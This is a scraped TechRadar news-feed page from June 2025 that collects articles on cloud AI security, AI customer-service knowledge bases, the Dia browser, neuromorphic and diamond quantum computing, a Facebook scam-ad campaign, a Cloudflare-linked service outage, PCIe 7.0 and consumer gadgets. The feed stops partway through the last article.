Error message

  • Deprecated function: implode(): Passing glue string after array is deprecated. Swap the parameters in drupal_get_feeds() (line 394 of /home/cay45lq1/public_html/includes/common.inc).
  • Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2405 of /home/cay45lq1/public_html/includes/menu.inc).

TechRadar News

New forum topics

Subscribe to TechRadar News feed
Updated: 1 hour 25 min ago

AI powered cloud creates AI powered risks

Fri, 06/13/2025 - 03:48

The IT infrastructure that underpins today’s businesses is unrecognizable from even a few months ago. Every organization, planned or unplanned, has migrated to the cloud with AI intertwined given each enhances the other's capabilities.

Cloud and AI are undeniable game changers for businesses; however both introduce complex cyber risks when combined. Cloud security measures must evolve to meet the new challenges of AI and find the delicate balance between protecting against complex attacks on AI data and enabling organizations to achieve responsible AI innovation.

The marriage of Cloud and AI

Cloud computing provides the infrastructure and resources needed to power AI algorithms, while AI makes cloud services more intelligent, efficient, and user centric. Underpinning this is the development team, running at full speed, creating and deploying new applications that reshape operations, enhance scalability, flexibility, and scrape cost savings where it can. But for those working to secure these shifting environments, it’s like trying to catch smoke. What is secure today may move, morph or even disappear entirely.

According to the Cloud AI Risk Report, cloud-based AI is prone to avoidable toxic combinations that leave sensitive AI data and models vulnerable to manipulation, data tampering and data leakage. As an illustration, this could leave AI training data susceptible to data poisoning, threatening to skew model results. Researchers calculated that almost 70% of cloud AI workloads contain at least one unpremeditated vulnerability.

Rather concerning was the discovery that three out of four organizations using one specific cloud provider for AI services were found to have overprivileged default configurations. Dubbed ‘The Jenga-style’ concept, the research found a tendency for cloud providers to build one service on top of the other, with “behind the scenes” building blocks inheriting risky defaults from one layer to the next, with any single misconfigured service putting all the services built on top of it at risk. The result is users left largely unaware of the existence of these behind-the-scenes building blocks as well as any propagated risk.

Threat Actors are circling

When we talk about AI usage in the cloud, more than sensitive data is on the line. If a threat actor manipulates the data or AI model, there can be catastrophic long-term consequences, such as compromised data integrity, compromised security of critical systems and degradation of customer trust. In addition, training and testing data is an attractive target for misuse and exploitation, as they may contain real information such as intellectual property, personal information (PI), personally identifiable information (PII) or customer data related to the nature of the AI project.

Threat actors are not just targeting AI but also harnessing it. Reports confirm that they have a number of powerful AI tools at their disposal, including AI-driven virtual assistants that can streamline and amplify their attacks. So far this year, there have been reports of threat actors harnessing AI to write malware for ransomware attacks. In fact, FunkSec, according to CheckPoint, is one such group that is believed to use AI-assisted malware development. The danger is that this could see inexperienced actors able to spin up and refine tools quickly to launch their own criminal escapades.

AI powered defenses

AI can be used to search for patterns, for the team to inspect what is happening within the organization's infrastructure and explain results in the simplest language possible. This can help the security team know what is important, the attack paths that could be travelled should a threat actor gain access, and where to best prioritize efforts to shut off these paths to reduce cyber risk. Solutions such as data security posture management (DSPM) and AI security posture management (AI-SPM) are becoming integral to many organizations.

Gartner defines DSPM as “... visibility as to where sensitive data is, who has access to that data, how it has been used, and what the security posture of the data stored or application is.” Put simply, DSPM solutions discover, classify and remediate data risks in cloud environments.

AI-security posture management (AI-SPM) is a cloud native application protection platform (CNAPP) domain that gives security teams full visibility and security of AI workloads, services and data used in training and inference without deploying an agent. It identifies and prioritizes AI resources based on sensitivity, access and risk relationships, providing the context needed to isolate the most critical AI exposures.

In summary

Though standalone DSPM and AI-SPM services act as powerful spotlights to illuminate data and AI resources, if they’re not combined with broader cloud security measures, they can't prevent unauthorized access or breaches that exploit vulnerabilities in the cloud infrastructure.

While the combination of AI and cloud offers immeasurable benefits, it introduces risks that could jeopardize sensitive data and data integrity, ultimately diminishing customer trust and business bottom lines. Organizations need DSPM and AI-SPM to pinpoint their valuable data and AI resources and cloud security solutions to build a secure vault around them.

We list the best antivirus software.

This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro

Categories: Technology

Capcom confirms Monster Hunter Wilds' second major title update will launch at the end of June

Fri, 06/13/2025 - 03:26
  • Monster Hunter Wilds' second major title update is coming soon
  • It's scheduled to release at the end of June 2025
  • A new event quest is scheduled to arrive next week, too

Monster Hunter Wilds developer Capcom has now confirmed that the game's next major content patch - Free Title Update 2 - is set to arrive at the end of June.

While no specific release date has been given as of yet, the official Monster Hunter X / Twitter account made the announcement alongside a teaser image of one of the update's highly-anticipated returning monsters - Lagiacrus.

Aside from Lagiacrus - who debuted in Monster Hunter 3 and hasn't been seen since Monster Hunter Generations Ultimate - there are a few things we know are coming in Free Title Update 2 thanks to Capcom's Director's Letter.

Posted to the official Monster Hunter website, the letter (written by game director Yuya Tokuda) confirms the second major update will bring a new high-difficulty Arch-tempered monster. Some weapons are also set to receive improvements, such as the Hammer and Dual Blades.

Several quality of life updates are also on the way, including improved navigation in the Grand Hub, "improved Seikret usability", photo mode adjustments and - perhaps best of all - layered weapons.

That last one, similar to layered armor, will let you cast a different appearance onto your equipped weapons. That's going to be awesome for players running a particular build that also might not like the way their weapon looks by default.

Additionally, Capcom has announced a new event quest will be arriving on June 17. Completion of the quest will earn you a Wudwud equipment set for your Palico companion, allowing you to dress them up as one of the adorable Scarlet Forest denizens.

You might also like...
Categories: Technology

Your AI is only as good as the knowledge base it ingested

Fri, 06/13/2025 - 01:28

Will your AI confidently deliver the right answers or stumble through outdated knowledge while your customers grow increasingly frustrated?

Artificial intelligence (AI) may be changing how businesses interact with customers but there's a critical element that often gets overlooked: the knowledge that powers it. The quality of AI responses directly depends on the information it can access – a relationship that becomes increasingly important as more organizations deploy AI for customer service.

AI is really good at accessing unstructured and structured data and collating it into a well-packaged natural language response. Unlike when you do a Google search, and it comes back with multiple responses (where the level of those answers is largely driven by advertising or other sponsorship) AI looks at the body of knowledge that supports the question being asked.

So, when talking about knowledge-driven AI for customer experience, it's the idea that AI isn't accessing the full scope but rather a well-structured knowledge base. This means companies must carefully choose what information AI can leverage, especially when dealing with decades worth of data.

For example, a customer asking how to make a payment might receive outdated instructions about writing a cheque if the knowledge base contains too much legacy content. By providing a well-structured database which is rich enough to give as many answers as possible but also limiting AI to that particular knowledge base, you can really focus on giving AI the right information to deliver the answers you want customers to receive.

The specificity advantage

When building AI knowledge bases, starting small and narrow before expanding works better than beginning with everything and trying to narrow down. Companies often make the mistake of giving AI access to their entire information universe.

This approach typically creates more problems than it solves. Contact centers especially struggle with AI accuracy when the knowledge base contains outdated information or when AI draws from too many different sources at once. This limitation becomes obvious when you consider AI-generated images. When AI attempts to create images of people, it often produces noticeable errors – too many fingers, oddly positioned hands, or unnatural facial features. AI conversations follow the same pattern.

They appear fine at first glance, but closer inspection reveals gaps in understanding, inappropriate tone, and mechanical empathy. The information provided might be technically correct but lacks the nuance and specificity that customers need. Just as with images, these conversation models improve over time, but the fundamental challenge remains – AI needs well-structured information to avoid these pitfalls.

Experiential learning over algorithms

Ultimately, AI delivers its most reliable performance when confined to specific knowledge and topics. Unlike human agents, AI performs best when it follows a script. This creates an interesting contrast with what we've learned in the BPO industry. Our experience shows that human agents excel when given freedom to go off-script and apply their natural problem-solving abilities.

The best human interactions happen when agents bring their full selves to the conversation. AI, however, functions more like a trainee who needs clear boundaries. You want to keep AI narrowly focused on approved scripts and content until it develops more sophistication. Human agents can provide answers beyond their formal training.

They navigate complex systems, find creative solutions and interpret customer needs in ways that aren't documented. These skills develop through experience and remain challenging for AI to replicate. Today's AI systems can't navigate through interfaces like humans can. They can't click through multiple screens, follow complex processes or interact with CRM systems the way human agents do. AI only knows what exists in its knowledge base.

This limitation highlights why incorporating the lived experience of human agents into AI knowledge bases delivers such dramatic improvements. AI also differs from humans in its approach to uncertainty. It never lacks confidence, even when wrong. AI will state incorrect information with complete certainty if its algorithms determine that's the optimal response.

Human agents learn differently. When customers express frustration or correct a mistake, human agents experience that uncomfortable "oh my gosh" moment that embeds the learning in their conversational memory. Even with limited information, humans adapt quickly. Most AI systems lack this emotional feedback loop, which raises an important question: how do we configure AI to incorporate negative feedback into its knowledge in a meaningful way?

Information architecture is an investment

Creating effective AI knowledge bases requires ongoing attention across several dimensions. The foundation must be structured, current content that accurately reflects your products and services. This isn't a one-time effort but a continuous commitment to maintenance and accuracy. Equally important is establishing appropriate boundaries – giving AI enough knowledge to be helpful while limiting its ability to access irrelevant or outdated information. Improvement must be continuous rather than occasional.

By monitoring where AI struggles and systematically addressing those gaps, organizations keep their systems relevant and effective. Integrating successful human agent interactions represents another critical factor. When you capture what works in human conversations and incorporate those patterns into your AI knowledge base, performance improves significantly. Finally, robust feedback mechanisms allow AI to learn from customer responses without being susceptible to manipulation, creating a system that improves over time.

AI technology will continue evolving, but its effectiveness will always depend on the quality of its knowledge foundation. Organisations that invest in properly structured, well-maintained knowledge systems will see better results from their AI implementations. The future isn't just about deploying more sophisticated AI technologies but building better knowledge ecosystems these technologies can leverage. Your AI is only as good as the knowledge base it's built upon, and getting that foundation right is essential for delivering the customer experience you actually want.

I tried 70+ best AI tools.

This article was produced as part of TechRadarPro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro

Categories: Technology

AI comes to the URL with a new web browser that answers you back

Thu, 06/12/2025 - 21:45
  • The Browser Company has launched an AI-powered browser named Dia
  • Dia integrates a personalized AI assistant directly into the address bar
  • The AI lets you chat with tabs and will adapt to your style over time

The Browser Company has a new way to travel the web using AI. Best known for its Arc browser, the company has introduced a new browser called Dia, which was first teased at the end of last year. This release follows an announcement last month that active development on Arc was winding down and the company would place its full weight behind Dia.

Unlike traditional browsers that send users searching across tabs or toggling between tools to get things done, Dia places an AI assistant directly into the browser’s address bar.

The idea is that instead of opening ChatGPT in another tab or copying content into a separate tool to summarize or rewrite, you just type your question where you’d usually enter a URL. From there, the assistant can search the web, answer questions about the page you’re on, compare tabs, or even draft content in the tone of a specific site.

Dia is built on Chromium and resembles a standard browser at first glance, but the key differences are found in the way AI suffuses its structure. The AI is omnipresent and customizable, plus there is no need to log in to a separate service. You stay on the page, talk to the browser, and it responds.

In many ways, Dia's AI behaves similarly to most other AI chatbots. You can ask it to summarize an article you're reading, help write an email based on your calendar and browser activity, or generate code with your preferred programming language. You can also personalize how the assistant writes for you in terms of style.

One of the more distinctive features is the browser’s ability to take on the “voice” of a given webpage. If you’re reading a corporate blog or product page and want to generate a document in a similar tone, Dia can adapt its output to match the site’s style.

Dia AI

The features are designed to blend seamlessly with the browser and your other online activities. The AI not only sees your current tabs but also remembers previous interactions, allowing it to use context in its responses. The more you interact with it, the more personalized the AI is supposed to become.

Eventually, it will remember your writing preferences and know which tasks you ask for often and surface those options. Dia is currently in an invite-only beta for Mac, though you can sign up for a waiting list to gain access.

Dia is arriving as browsers race to incorporate AI, and many AI developers are working on browsers. Google Chrome is testing Gemini-powered overlays and sidebars, Opera has its Neon browser promising a full AI agent experience, and Perplexity has its new Comet browser with AI features.

For the many people understandably concerned about privacy when the AI is this clever, The Browser Company claims that Dia handles user context locally where possible and does not send browsing data to third-party providers unless required by the task.

Notably, Dia is centering AI as the main way to engage with the browser. The experience is meant to be rooted in user prompts and direct interaction, not automation. It's also worth noting that Dia means The Browser Company no longer sees Arc as worth spending resources on, despite praise for its design and rethinking of tab management. Dia is less about reinventing browser layouts and more about AI as core functions.

With AI rapidly becoming embedded in everything you touch online, Dia represents a very direct approach to making generative AI central to going online rather than treating AI as a bolt-on feature. The Browser Company is betting that it can be the primary interface for how users browse the web.

You might also like
Categories: Technology

A system inspired by the human brain has quietly been activated at a US nuclear lab, and it has no operating system or storage

Thu, 06/12/2025 - 16:48
  • SpiNNaker 2 supercomputer operates without disks or an operating system for unmatched speed
  • Sandia’s system uses 152 cores per chip to mimic the parallelism of the human brain
  • With 138,240 terabytes of DRAM, the SpiNNaker 2 relies entirely on memory speed

A new computing system modeled after the architecture of the human brain has been activated at Sandia National Laboratories in the US state of New Mexico.

Developed by Germany-based SpiNNcloud, the SpiNNaker 2 stands out not only for its neuromorphic design, but also for its radical absence of an operating system or internal storage.

Backed by the National Nuclear Security Administration’s Advanced Simulation and Computing program, the system marks a noteworthy development in the effort to use brain-inspired machines for national security applications.

SpiNNaker 2 differs from conventional supercomputers

Unlike conventional supercomputers that rely on GPUs and centralized disk storage, the SpiNNaker 2 architecture is designed to function more like the human brain, using event-driven computation and parallel processing.

Each SpiNNaker 2 chip carries 152 cores and specialized accelerators, with 48 chips per server board. One fully configured system contains up to 1,440 boards, 69,120 chips, and 138,240 terabytes of DRAM.

These figures point to a system that is not just large but built for a very different kind of performance, one that hinges on speed in DRAM rather than traditional disk-based I/O.

In this design, the system’s speed is attributed to data being retained entirely in SRAM and DRAM, a feature SpiNNcloud insists is crucial, stating, “the supercomputer is hooked into existing HPC systems and does not contain any OS or disks. The speed is generated by keeping data in the SRAM and DRAM.”

SpiNNcloud further claims that standard parallel Ethernet ports are “sufficient for loading/saving the data,” suggesting minimal need for the elaborate storage frameworks typically found in high-performance computing.

Still, the real implications remain speculative. The SpiNNaker 2 system simulates between 150 and 180 million neurons, impressive, yet modest compared to the human brain’s estimated 100 billion neurons.

The original SpiNNaker concept was developed by Steve Furber, a key figure in Arm’s history, and this latest iteration appears to be a commercial culmination of that idea.

Yet, the true performance and utility of the system in real-world, high-stakes applications remain to be demonstrated.

“The SpiNNaker 2’s efficiency gains make it particularly well-suited for the demanding computational needs of national security applications,” said Hector A. Gonzalez, co-founder and CEO of SpiNNcloud, emphasizing its potential use in “next-generation defense and beyond.”

Despite such statements, whether neuromorphic systems like SpiNNaker 2 can deliver on their promises outside specialized contexts remains an open question.

For now, Sandia’s activation of the system marks a quiet but potentially important step in the evolving intersection of neuroscience and supercomputing.

Via Blocks & Files

You might also like
Categories: Technology

This German startup wants to build portable quantum computers using diamonds - and says its QPU will sit next to a GPU or a CPU one day

Thu, 06/12/2025 - 15:20
  • QPUs may run AI inference faster and cheaper than conventional hardware ever could
  • Hybrid nodes combining CPUs, Nvidia GPUs, and diamond QPUs could change how we build quantum software
  • From defense to finance, Quantum Brilliance is betting on diamond chips to drive adoption

Diamonds have emerged as a critical material in the development of quantum technologies due to their unique atomic properties, and Quantum Brilliance, a company based in Germany and Australia, has outlined an ambitious plan to develop portable quantum computers using diamond-based quantum processing units (QPUs).

These devices are being designed to operate at room temperature and may eventually be integrated alongside GPUs and high-end CPUs in servers or vehicles.

But while the company’s vision promises a future where quantum computing is as seamless as plugging in a GPU for AI inference, several technical and commercial hurdles remain.

Rethinking quantum computing with diamonds

Over the past decade, researchers have increasingly focused on engineering high-purity synthetic diamonds to minimize interference from impurities.

Notably, a 2022 collaboration between a Japanese jewelry firm and academic researchers led to a new method for producing ultra-pure 2-inch diamond wafers.

In 2023, Amazon joined the effort through its Center for Quantum Networking, partnering with De Beers’ Element Six to grow lab-made diamonds for use in quantum communication systems.

Now, Quantum Brilliance aims to utilize nitrogen vacancies in diamond to create qubits, offering a more compact and power-efficient alternative to cryogenic quantum systems.

“We do have a roadmap to fault tolerance, but we are not worrying about that at the moment,” said Andrew Dunn, COO of Quantum Brilliance.

“People think of millions of qubits, but that will be very expensive and power hungry. I think getting an understanding of having 100 qubits in a car cheaply and simply - the use cases are very different."

This signals a departure from the prevailing trend in quantum computing, which focuses on building systems with millions of qubits.

The company is instead targeting inexpensive and practical use cases, particularly in applications such as AI inference and sparse data processing.

Quantum Brilliance is already collaborating with research institutions like the Fraunhofer Institute for Applied Solid State Physics (IAF).

IAF is currently evaluating the company’s second-generation Quantum Development Kit, QB-QDK2.0, which integrates classical processors like Nvidia GPUs and CPUs with the QPU in a single box.

In parallel, Oak Ridge National Laboratory in the US has acquired three systems to study scalability and parallel processing for applications like molecular modeling.

“The reason they are buying three systems is that they want to investigate parallelisation of systems,” Dunn added.

Quantum Brilliance is also working closely with imec to integrate diamond processes into standard chip manufacturing.

Beyond computation, the company sees potential in quantum sensing, and the technology may also be repurposed for defense and industrial sensors.

Ultimately, the company wants quantum computing to become as ordinary as any other chip in a server.

“Personally, I want to make quantum really boring and invisible, just another chip doing its job,” said Dunn.

Via eeNewsEurope

You might also like
Categories: Technology

This Android AirTags rival finally got the one big feature it's been missing

Thu, 06/12/2025 - 15:00
  • The Moto tag finally supports ultra-wideband tracking
  • This brings the Android Find Hub tracker on par with Apple's AirTags
  • No word yet on when other Find Hub trackers will support UWB

Google’s Find Hub – previously Find My Device – has been a fairly proficient Android alternative to the always useful Apple Find My service, with both the Android and iOS options helping you locate your missing tech. But until now, Google’s service has lacked a key feature: ultra-wide band finding.

Find Hub can help you locate your phone, headphones, compatible Bluetooth trackers, and even close friends and family, all from one app. If you’ve not used the service (admittedly, it can feel a little hidden behind Google’s better known Android apps) it’s a useful one-stop finding shop that you’ll want to add to your home screen.

However, it has lacked one of Apple's core benefits of its Find My service: ultra-wideband tracking.

This upgraded variant of Bluetooth tracking allows your phone to more accurately track the precise location of the tag. Rather than simply being further or closer to the missing tag, the app can give you much more precise directions and distances thanks to UWB. But until now, no Find Hub devices offered UWB as an option.

(Image credit: Future/Jacob Krol)

Now, finally, the Moto Tag does so thanks to a firmware update, as spotted by Android Police. Once installed via the Moto Tag app (currently rolling out through the Play Store), you can launch the Find Hub app, and the updated tracker will be discoverable via UWB.

You’ll also need a high-end smartphone. While a few years-old devices support UWB, the feature is exclusive to premium models like the Google Pixel 6 Pro, and Samsung Galaxy S21 Plus and Ultra. The standard flagships, unfortunately, lack the feature for now.

Hopefully, as other UWB trackers arrive for Android, there will be more reason for budget-friendly devices to support it. For now, Moto’s Tag appears to be the only UWB device supported by Find Hub.

Beyond UWB, Google’s Find Hub is also set to gain support for tracking some devices using satellites “later this year” (via Google’s blog), making the service even more useful than it currently is. That would let the service not just catch up to Apple, but effectively take the lead.

You might also like
Categories: Technology

No, those amazing deals on Facebook aren't real - it's a scam, and here's how to spot it

Thu, 06/12/2025 - 14:34
  • High-end and luxury products are being advertised with huge savings
  • 4,000+ fake domains impersonating big brands have been spotted
  • Victims are losing money without receiving their products

More than 4,000 fake domains impersonating popular brands have been spotted in a scheme pushing scam ads targeting Facebook users.

The campaign was uncovered by threat analysis from Silent Push, in a trend researchers are calling "GhostVendors," which sees scam ads for the false domains primarily run on Facebook Marketplace by exploding Meta's ad policy loopholes, with ads being removed from the Meta Ad Library upon campaign completion to prevent tracking efforts, helping attackers remain undercover.

Key to the fake ads are unrealistically low prices designed to lure victims into thinking they've found a bargain – for example, researchers spotted a Milwaukee Tool chest for $129.

Scam artists are luring shoppers via Facebook ads

The ads also instil a sense of urgency by using keywords like 'clearance', 'Holiday sale' or 'excess inventory', applying pressure on buyers to act promptly.

Links on the ads lead to scam sites that look like their genuine counterparts through Domain Generation Algorithms and template cloning, with redirection also applied to pull victims towards malicious sites.

Countless brands have been observed imitated across the more than 4,000 fake domains, including retailers (Amazon, Costco, Argos), footwear (Birkenstock, Crocs, Skechers) and gift sites (Bath & Body Works, Yankee Candle).

Being that there have been so many attacks, consequences can vary. Many victims have had their payment information stolen with no goods delivered, or have experienced financial fraud. Moreover, the threat appears to be on a global scale and is not restricted to a core country or region.

Silent Push says threat actors have demonstrated a deep understanding of Meta's ad systems, which have been criticized for not keeping a public archive of inactive scam ads and for not allowing holistic tracking without (prohibited) external scraping.

In the meantime, potential victims (including virtually all online shoppers) are being advised to warn ads that appear too good to be true.

Users can also verify the authenticity of deals by visiting websites directly. It's also recommended that online purchases are made with credit cards that come with additional protection, with direct bank transfers totally inadvisable.

You might also like
Categories: Technology

Can't access Spotify or a part of Google? Everything we know about this outage impacting major services

Thu, 06/12/2025 - 14:29

If you’ve been experiencing issues with a single part or various parts of Google’s massive operation, or with playing your favorite songs or podcasts on Spotify, you’re not alone.

Since over an hour ago, at 2 PM ET in New York City, reported issues on outage tracker Down Detector have been spiking for Google, Google Cloud, and Spotify, to the extent that Google has confirmed issues impacting its various services as of 3:01 PM ET.

Spotify normally comments on issues via the @SpotifyStatus account on X (formerly Twitter), but as of now, it’s remaining silent. Now, the TechRadar team uses various parts of Google – mainly G-Suite with Docs – and hasn’t encountered issues yet, but my Spotify has been experiencing some issues with extended load times.

Considering that two major services are reporting issues, this could signal larger issues with a cloud data provider like Cloudflare. Either route, we’re starting our live reporting to keep you up to date on the latest developments with the outages affecting Google and Spotify.

A Quick Look at Down Detector’s homepage as of 3:25 PM ET shows that an extensive range of services are experiencing issues, with some leveling off or dropping, with Google, Google Cloud, and Spotify at the forefront, alongside Discord and Amazon Web Services (AWS).

Google and Google Cloud both began spiking in the 2 PM ET hour, reaching over 10,000 reports, while Spotify also started in that hour but is currently at over 44,000 reports.

(Image credit: Future)Google is investigating the issue

Google's status page currently lists an active 'Service Disruption' as of 3:01PM ET that is impacting a number of services – it's a good note, though, as teams at the company are investigating.

"We're investigating reports of an issue with Gmail, Google Calendar, Google Chat, Google Cloud Search, Google Docs, Google Drive, Google Meet, Google Tasks, and Google Voice. We will provide more information shortly.

Multiple Workspace products beginning on Thursday, at 2025-06-12 10:58 PDT may be experiencing service issues.

Our engineers are currently investigating the issue.

We apologize to all who are affected by the disruption."

It's impacting several services from the entire G-Suite, including Gmail. Still, Google doesn't clarify if a specific user set is experiencing the issue. As of now, I can access my personal and work Google accounts without problem. However, individuals in the comments on Down Detector are reporting issues with Messages, Google Cloud, and Google Voice.

Spotify has still not issued a statement, although reported issues on Down Detector continue to grow, now standing at over 45,000 reports as of 3:22 PM ET. We have also reached out to the streaming giant to request a comment.

It does seem that a majority of these issues started shortly after the 2 PM ET hour and are now stretching to over an hour of disruptions.

At the same time that these issues with Google and Spotify began emerging, Cloudflare is dealing with its own problems, according to the company's status page.

The latest update, as of 3:12 PM ET, from Cloudfalre notes that its services are starting to recover, but issues are still present.

"We are starting to see services recover. We still expect to see intermittent errors across the impacted services as systems handle retried and caches are filled."

Considering that Discord and Snapchat are also experiencing a spike in reports, these issues may well be related to the problems affecting Cloudflare.

(Image credit: Future)Google's making progress, says everything but Meet is fixed

(Image credit: Google)

Google is making some progress, at least according to the latest update on its Workspace status page, posted at 3:30 PM ET.

It reads: "All product impacts except Google Meet have recovered.

Google engineers continue to work on full mitigation."

This is good news for folks in the Google ecosystem, as it appears everything but Google Meet is back up. And even reports for Google's calling platform are starting to drop on Down Detector, now sitting at 1,854 reports as of 3:31 PM ET.

Snapchat and Discord are both seeing reported issues spikes

(Image credit: Future)

Alongside issues impacting Google, Google Cloud, and Spotify, reported issues with Snapchat and Discord are both elevated on Down Detector.

Reported issues with Discord are currently sitting at 6,683 as of 3:35PM ET, but did spike to over 10,000 at 2:20PM ET – the same hour where Google and Spotify saw major increases.

Snapchat is currently on the rise, with over 6,693 reported issues with the platform. For what it's worth, I can open the app on my iPhone, but I'm unable to load stories or the main page.

Google gives the all clear on Workspace issues

(Image credit: Future / Lance Ulanoff)

The Google Workspace status page now effectively says we're all clear. In a post that went live 3:53PM ET, Google says all the issues are resolved.

"The problem with Gmail, Google Calendar, Google Chat, Google Cloud Search, Google Docs, Google Drive, Google Meet, Google Tasks, and Google Voice has been resolved. We apologize for the inconvenience and thank you for your patience and continued support."

Reports on Down Detector have slowed for both and have been on the decline, so it appears that most services are coming back or already back. Again, this does line up with Cloudflare's reported issues, and those are starting to recover.

Cloudflare is having some critical issues

(Image credit: Shutterstock/Sharaf Maksumov)

Cloudflare has posted a new update as of 3:57 PM ET on its own status page, detailing a bit more about what is going on and the potential impact here. You can see the statement in full below, but Cloudflare’s critical Workers KV service went offline due to a separate outage hitting a key third-party service.

A Worker KV is essentially a flow or automation that moves requests throughout Cloudflare's vast network, mainly starting or ending in storage libraries.

Furthermore, Cloudflare acknowledges that it's aware of the significant impact this is causing and is working to resolve the issue as soon as possible with all hands on deck.

Cloudflare’s critical Workers KV service went offline due to an outage of a 3rd party service that is a key dependency. As a result, certain Cloudflare products that rely on KV service to store and disseminate information are unavailable including:

Access

WARP

Browser Isolation

Browser Rendering

Durable Objects (SQLite backed Durable Objects only)

Workers KV

Realtime

Workers AI

Stream

Parts of the Cloudflare dashboard

Turnstile

AI Gateway

AutoRAG

Cloudflare engineers are working to restore services immediately. We are aware of the deep impact this outage has caused and are working with all hands on deck to restore all services as quickly as possible.

Google Cloud is still having issues

While Google says the issues affecting Workspace have been resolved, but the Google Cloud dashboard continues to display issues.

There are still "Multiple GCP products are experiencing Service issues," in fact, it's over 39 products including API Gateway, Agent Assist, and AlloyDB for PostgreSQ across the globe. This is the latest update from Google Cloud as of 3:56PM ET, you can see the status page here.

Impacted services are starting to recover

(Image credit: Future)

Google, Google Cloud, Spotify, Snapchat, and Discord, among other services that saw an increase in reported issues on Down Detector, are all starting to show a decline, and that's a good thing.

It's been roughly two and a half hours since we started seeing a spike in the 2PM hour for services like Google and Spotify, with the latter seeing over 44,000 reported issues. While Spotify has yet to provide any comment, Google Workspace and Google Cloud have been updating status dashboards. The former states that things are back to normal, while the latter continues to show some impacted services.

Down Detector is looking a lot better now, though reported outages do remain for all these platforms.

Cloudflare is still working to bring all of its impacted services back online, with the last update on its dashboard at 3:57 PM ET. That concluded with, "We are aware of the deep impact this outage has caused and are working with all hands on deck to restore all services as quickly as possible."

Cloudflare say it's services are 'recovering quickly' around the globe

In line with impacted services reported outages dropping on Down Detector, Cloudflare says its services are 'recovering quickly' across the globe in an update on its status page as of 4:32PM ET. It's expecting a 'steady drop' in services impacted and 'further recovery' in the next few minutes.

That's good news and likely means that Google, Spotify, and other services will be back online for you soon, if not already.

"Cloudflare services are recovering quickly around the globe. WARP and Turnstile are operational, though a small residual impact remains and we’re working to eliminate it. The core KV service is restored, bringing dependent products back online. We expect further recovery over the next few minutes and a steady drop in impact."

Now, Cloudflare says it's back to fully operational in an update that was posted just before the top of the hour at 4:57PM ET.

It reads in full: "All Cloudflare services have been restored and are now fully operational. We are moving the incident to Monitoring while we watch platform metrics to confirm sustained stability."

It's an excellent update for those who have felt the impact of this outage, and hopefully, any issues you've experienced have been resolved. While many services were impacted today, alongside this Cloudflare outage, Down Detector is looking a lot better with declines.

Google Workspace's status page indicates that the incident is resolved, while Google Cloud's status page still displays an active incident worldwide.

Furthermore, although Spotify didn't confirm an issue, the brand's care account is responding to a few users, recommending a restart of the app if they're unable to use the service.

Categories: Technology

PCIe 7.0 has been announced, offering superfast speeds for the components inside your PC – but don’t get excited just yet

Thu, 06/12/2025 - 14:06
  • The spec for PCIe 7.0 has been announced
  • It’s a new standard for even faster – incredibly quick – connections with PCIe components in your PC
  • The standard is still in the earliest stages, though, and won’t be here for a long time (PCIe 6.0 hasn’t quite arrived yet, in fact)

PCIe (PCI Express) connectivity continues to forge ahead and already a new spec for a future generation of PCs has been announced, which is PCIe 7.0.

VideoCardz reports that PCI-SIG, the organization that oversees the standard, has announced PCIe 7.0 and is boasting about just how fast it’ll be. (Spoiler alert: really, really fast).

But wait a minute – aren’t we still on PCIe 5.0 these days? Well, yes, that’s what a (cutting-edge) PC will support, and I’ll come back to exactly what’s going on with the development path of the PCI Express standard (and PCIe 6.0) momentarily.

PCIe 7.0 is currently a spec that has just been sketched out, and it’ll offer a data rate of 128GT/s, which is twice the speed of PCIe 6.0 (which itself doubled the transfer rate of PCIe 5.0).

With PCIe 7.0, you’ll get support for up to 16 PCIe lanes (in a single slot) and up to 512GB/s of bandwidth in total (in both directions). PCIe lanes are bi-directional (meaning data can be sent in either direction) lines of communication hooking up PCIe components – primarily the graphics card or SSDs (but also other miscellaneous boards) – to the motherboard.

Collectively, PCIe lanes facilitate all these key components working in your PC (read up more about this here).

So, while much faster speeds for that communication is indeed a potentially big deal for the future, for the performance of GPUs and drives mainly, we are very much looking to the future here – meaning way down the line.

Analysis: Timescales – and PCIe 8.0 appearing on the horizon

(Image credit: Future / John Loeffler)

As I already mentioned, we are on PCIe 5.0 right now. PCIe 6.0 was announced at the start of 2022, over three years ago, and still remains in development, though it is now nearing the finish line – we may even see the first hardware supporting it arrive later this year (or early next).

So, as you can imagine, we’re looking towards the end of the decade before PCIe 7.0 actually pitches up. Leading up to that milestone, hardware makers will be working away with the standard, developing and testing prototypes, and refining the final hardware for three or four years. And initially, that hardware will be used in the likes of quantum computing, data centers and other demanding tasks – not consumer PCs.

And meanwhile, PCI-SIG has confirmed that work on concocting the PCIe 8.0 standard has already begun.

So, while this is all well and good, with these incoming standards lining up and sounding ever more blisteringly fast, what’s the impact for consumers in the nearer-term? Not a lot, frankly. Even the top-tier, super-expensive examples of the best GPUs currently available aren’t pushing the boundaries of PCIe 5.0 yet – there’s no need for anything faster, not even in the flashiest PC.

However, there are niche cases where older PCIe standards are now hampering some new graphics cards.

A case in point is the RTX 5060 Ti (or non-Ti) with 8GB of video RAM, which loses some performance when it’s in a PCIe 4.0 motherboard slot because that slower standard isn’t enough – and if your motherboard’s still using PCIe 3.0, that’s a world of performance pain. (For a detailed explanation of why this GPU is problematic in this way, check here – AMD’s RX 9060 XT is also held back by its 8GB of VRAM).

Really, though, this is outlier stuff more than anything (and frankly, more to do with questionable decision-making and configuration of these graphics cards in the first place). Still, with ever-faster PCIe standards rolling inexorably towards us, in the future, even aging consumer PCs might cope better with whatever dubious decisions GPU makers throw at them.

Furthermore, as recently discussed, advancing the PCIe spec and keeping it very much on the cutting-edge is important in terms of maintaining standardization for the connection of PC components.

You might also like
Categories: Technology

Edifier’s new retro-style wireless speaker range looks very cool, and has the features to take on JBL and Sonos

Thu, 06/12/2025 - 14:00
  • Edifier reveals 3 speakers, from tabletop to super-portable
  • 6W, 34W and 60W speaker models
  • New ANC headphones with 92-hour battery life

I'm a big fan of modern tech in retro clothes: give me a hi-res audio player that looks like an old AM radio and you can take my money. And I'm also a fan of corporate PR nonsense. So the launch of the new Edifier ES Series of speakers and headphones has put me in my happy place.

